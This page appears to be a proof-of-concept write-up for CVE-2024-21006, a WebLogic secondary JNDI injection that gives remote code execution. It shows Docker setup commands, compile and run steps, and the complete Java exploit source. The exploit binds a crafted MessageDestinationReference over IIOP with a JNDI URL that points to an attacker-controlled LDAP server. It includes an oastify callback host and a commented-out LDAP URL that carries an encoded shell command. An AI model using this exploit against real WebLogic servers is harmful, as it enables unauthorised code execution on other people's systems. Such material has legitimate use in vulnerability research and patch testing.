WebLogic - CVE-2024-21006
CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing RCE.
Project is based on the findings of pwnull and code from momika223.
Proof-of-Concept
Oracle 14.1.1.0
apt :: ~ » docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
fa9822b7dfd5 container-registry.oracle.com/middleware/weblogic:14.1.1.0 "/u01/oracle/createA…" 23 hours ago Up 2 hours 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp 14110-weblogicPrepare the environment by uploading MainClass.java and META-INF/MANIFEST.MF to the WebLogic container.
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/Compile the code.
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle 2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle 1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle 3717 Oct 10 08:01 MainClass.java
[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)[oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar
Target IP: 127.0.0.1
Target Port: 7001
RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com
Source code
// MainClass.java
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Scanner;
import java.util.Hashtable;
import java.util.Random;
public class MainClass {
public static void main(String[] args) throws Exception {
Scanner scanner = new Scanner(System.in);
System.out.print("Target IP: ");
String ip = scanner.nextLine();
System.out.print("Target Port: ");
String port = scanner.nextLine();
System.out.print("RMI Address (ip:port/exp): ");
String rmiexp = scanner.nextLine();
Random bindname = new Random();
int bindint = bindname.nextInt(10000);
// String ip = "127.0.0.1";
// String port = "7001";
// String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";
String rhost = String.format("iiop://%s:%s", ip, port);
Hashtable<String, String> env = new Hashtable<String, String>();
// add wlsserver/server/lib/weblogic.jar to classpath,else will error.
env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
env.put(Context.PROVIDER_URL, rhost);
Context context = new InitialContext(env);
// Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");
weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
@Override
public String[] getDescriptions() {
return new String[0];
}
@Override
public void addDescription(String s) {
}
@Override
public void removeDescription(String s) {
}
@Override
public void setDescriptions(String[] strings) {
}
@Override
public String getMessageDestinationRefName() {
return null;
}
@Override
public void setMessageDestinationRefName(String s) {
}
@Override
public String getMessageDestinationType() {
return "weblogic.application.naming.MessageDestinationReference";
}
@Override
public void setMessageDestinationType(String s) {
}
@Override
public String getMessageDestinationUsage() {
return null;
}
@Override
public void setMessageDestinationUsage(String s) {
}
@Override
public String getMessageDestinationLink() {
return null;
}
@Override
public void setMessageDestinationLink(String s) {
}
@Override
public String getMappedName() {
return null;
}
@Override
public void setMappedName(String s) {
}
@Override
public InjectionTargetBean[] getInjectionTargets() {
return new InjectionTargetBean[0];
}
@Override
public InjectionTargetBean createInjectionTarget() {
return null;
}
@Override
public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {
}
@Override
public String getLookupName() {
return null;
}
@Override
public void setLookupName(String s) {
}
@Override
public String getId() {
return null;
}
@Override
public void setId(String s) {
}
}, "ldap://" + rmiexp, null, null);
context.bind("pthree"+bindint,messageDestinationReference);
context.lookup("pthree"+bindint);
}
}// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Main-Class: MainClass
Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jarLast updated
Was this helpful?